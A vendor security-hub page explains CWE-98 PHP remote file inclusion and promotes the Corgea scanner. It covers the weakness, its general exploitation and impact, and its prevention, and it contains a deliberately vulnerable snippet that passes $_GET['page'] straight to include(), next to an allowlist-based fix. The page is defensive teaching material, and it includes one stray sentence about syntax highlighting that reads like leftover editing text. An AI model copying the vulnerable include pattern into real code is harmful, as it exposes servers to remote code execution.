Corgea LogoCorgea Security Hub

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Learn about CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')), its security impact, exploitation methods, and prevention guidelines.

What is Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')?

• Overview: Improper Control of Filename for Include/Require Statement in PHP Program (CWE-98) occurs when a PHP application uses user input to determine the filename for include or require functions without proper validation, potentially allowing attackers to execute arbitrary code.

• Exploitation Methods:

  • Attackers can exploit this vulnerability by supplying a URL to a remote file containing malicious code, which gets executed by the application.
  • Common attack patterns include URL manipulation and path traversal to include files that should not be accessible or executed.

• Security Impact:

  • Direct consequences include remote code execution, allowing attackers to execute any command or script on the server.
  • Potential cascading effects include unauthorized data access, system compromise, and further network penetration.
  • Business impact may involve data breaches, service disruptions, reputational damage, and financial losses.

• Prevention Guidelines:

  • Specific code-level fixes include validating and sanitizing all user inputs that determine filenames for include/require functions.
  • Security best practices involve using allowlists for acceptable file inclusions and avoiding user-controlled input for file paths.
  • Recommended tools and frameworks include PHP security libraries that handle input validation and configuration settings that disable remote file inclusions.
Corgea can automatically detect and fix Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in your codebase. [Try Corgea free today](https://corgea.app).

Technical Details

Likelihood of Exploit: High

Affected Languages: PHP

Affected Technologies: Not specified

Vulnerable Code Example

// This code demonstrates a PHP Remote File Inclusion vulnerability.
// The script includes a file based on user input without proper validation,
// allowing an attacker to include remote files, which could lead to remote code execution.

if (isset(\$_GET['page'])) {
    include(\$_GET['page']); // Vulnerable: Directly using user input in include()
} else {
    include('default.php');
}

How to fix Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')?

To resolve this vulnerability, it is essential to ensure that user input is not directly used in file operations without thorough validation and sanitization. The following measures should be taken:

  1. Whitelist Validation: Only allow files from a predetermined list of safe files. This prevents unauthorized file inclusion.
  2. Sanitize Input: Remove any illegal characters from the input to prevent directory traversal attacks.
  3. Use Static Paths: Avoid using user input in paths directly. If dynamic inclusion is necessary, ensure it's restricted to local files only.
  4. Disable Remote File Inclusion: Ensure that allow_url_include is set to Off in the PHP configuration to prevent remote file inclusion.

Fixed Code Example

// This is the fixed version of the above code, mitigating the Remote File Inclusion vulnerability.

\$allowed_pages = ['about.php', 'contact.php', 'home.php']; // Define a whitelist of allowable files

if (isset(\$_GET['page'])) {
    \$page = basename(\$_GET['page']); // Sanitize input to remove directory traversal characters
    if (in_array(\$page, \$allowed_pages)) { // Check against the whitelist
        include(\$page); // Safe inclusion of the file from the whitelist
    } else {
        include('404.php'); // Include a safe error page if the file is not in the whitelist
    }
} else {
    include('default.php');
}

Additional Best Practices

  • Configuration Hardening: Ensure allow_url_fopen and allow_url_include are disabled in the php.ini to prevent remote code execution through URL file inclusion.
  • Logging and Monitoring: Implement logging for all include operations and monitor logs for any suspicious activities.
  • Regular Security Audits: Conduct regular security audits to identify and fix vulnerabilities early.
  • Keep Software Updated: Regularly update PHP and any libraries your application depends on to the latest secure versions.

This improved version ensures proper syntax highlighting, correct line number formatting, and realistic demonstration of the vulnerability and its fix. The comments have been expanded to provide thorough explanations of the issues and solutions.

Corgea Logo

Find this vulnerability and fix it with Corgea

Scan your codebase for CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') and get remediation guidance

Start for free and no credit card needed.